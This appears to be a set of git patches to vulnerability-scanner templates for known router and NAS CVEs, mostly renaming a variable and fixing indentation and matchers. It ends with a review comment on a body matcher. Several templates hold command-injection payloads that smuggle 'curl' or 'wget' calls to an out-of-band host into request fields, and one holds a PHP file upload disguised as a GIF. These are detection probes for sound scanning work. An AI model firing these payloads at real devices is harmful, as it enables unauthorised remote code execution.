@@ -38,6 +41,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index ae16e2387b..d26a507975 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-434 tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -34,7 +37,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 19:24:19 +0530 Subject: [PATCH 13/15] update variable name --- cves/2018/CVE-2018-10562.yaml | 8 ++++---- cves/2018/CVE-2018-10818.yaml | 8 ++++---- cves/2020/CVE-2020-17456.yaml | 6 +++--- cves/2020/CVE-2020-25506.yaml | 8 ++++---- cves/2020/CVE-2020-28188.yaml | 8 ++++---- cves/2020/CVE-2020-28871.yaml | 6 +++--- cves/2021/CVE-2021-1497.yaml | 8 ++++---- cves/2021/CVE-2021-20038.yaml | 6 +++--- cves/2021/CVE-2021-21881.yaml | 8 ++++---- cves/2021/CVE-2021-36356.yaml | 6 +++--- cves/2021/CVE-2021-41653.yaml | 6 +++--- 11 files changed, 39 insertions(+), 39 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index a8a7b30bc8..e638d7ca87 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: 
@@ -26,13 +26,13 @@ requests: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true matchers-condition: and @@ -45,6 +45,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index a3c191a56c..f157cb4167 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -14,7 +14,7 @@ info: tags: cve,cve2018,lg-nas,rce,oast,injection variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -23,14 +23,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true matchers-condition: and 
@@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/04/26 diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index bd364bde5b..83e03db640 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -17,7 +17,7 @@ info: tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -34,7 +34,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -47,7 +47,7 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" - type: word part: header diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 31d960594d..f35292e9bf 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: 
@@ -26,10 +26,10 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a3359eb1bf..0b09578f43 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -18,16 +18,16 @@ info: tags: cve,cve2020,terramaster,rce,oast,mirai,unauth variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: - | - GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true @@ -41,6 +41,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index d26a507975..6d2d4dfbb5 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml 
@@ -17,7 +17,7 @@ info: tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -37,7 +37,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 19:41:27 +0530 Subject: [PATCH 14/15] updated indentation --- cves/2018/CVE-2018-10562.yaml | 2 +- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2020/CVE-2020-17456.yaml | 2 +- cves/2020/CVE-2020-25506.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2021/CVE-2021-1497.yaml | 2 +- cves/2021/CVE-2021-20038.yaml | 2 +- cves/2021/CVE-2021-21881.yaml | 2 +- cves/2021/CVE-2021-36356.yaml | 2 +- cves/2021/CVE-2021-41653.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index e638d7ca87..c0c7afa943 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f157cb4167..d49bf23b46 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -14,7 +14,7 @@ info: tags: cve,cve2018,lg-nas,rce,oast,injection variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index 83e03db640..a0c70a8edc 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -17,7 +17,7 @@ info: tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: 
diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index f35292e9bf..5eaf14d02b 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 0b09578f43..d36924cfe8 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2020,terramaster,rce,oast,mirai,unauth variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 6d2d4dfbb5..b9b848b20b 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -17,7 +17,7 @@ info: tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index f51cfe80f2..3e42da4a28 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -21,7 +21,7 @@ info: tags: cisco,rce,oast,kev,packetstorm,cve,cve2021 variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-20038.yaml b/cves/2021/CVE-2021-20038.yaml index d320d216df..f55379ac20 100644 --- a/cves/2021/CVE-2021-20038.yaml +++ b/cves/2021/CVE-2021-20038.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2021,overflow,rce,sonicwall,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml index 72c09c184b..f155201ccb 100644 --- a/cves/2021/CVE-2021-21881.yaml +++ b/cves/2021/CVE-2021-21881.yaml 
@@ -16,7 +16,7 @@ info: tags: cve,cve2021,lantronix,rce,oast,cisco variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-36356.yaml b/cves/2021/CVE-2021-36356.yaml index 4ada4b3c36..d883e92563 100644 --- a/cves/2021/CVE-2021-36356.yaml +++ b/cves/2021/CVE-2021-36356.yaml @@ -18,7 +18,7 @@ info: tags: viaware,cve,cve2021,kramer,edb,rce variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index 2be9159667..eace8f6211 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2021,tplink,rce,router variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: From de7e8de1e79ff67488b3baa841f9743da8d3bcfe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 21:54:31 +0530 Subject: [PATCH 15/15] fixed matcher --- cves/2020/CVE-2020-28976.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 06dfae7787..37ad9fad53 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -25,10 +25,25 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" + - type: word + part: body + words: + - "null" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + # Enhanced by md on 2023/02/01
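Review bot: `- "null"` as a `part: body` word match is satisfied by any response containing that substring (`{"error":null}` is enough), so it does not pin the `tree.php` response the way the commit title suggests; if the vulnerable endpoint answers with the bare JSON literal `null` when its request to `{{interactsh-url}}` returns nothing, match that exactly, e.g. `- type: regex` with `part: body` and `regex:` `- '^null\s*$'`. Also consider what `matchers-condition: and` does here: a confirmed HTTP interaction at interactsh is now discarded whenever the status, content type or body deviates (a non-200 or non-JSON reply from a version that still performs the outbound request), which trades false positives for false negatives. I cannot see the plugin's actual response from here, so the exact-body form should be checked against a real instance before tightening.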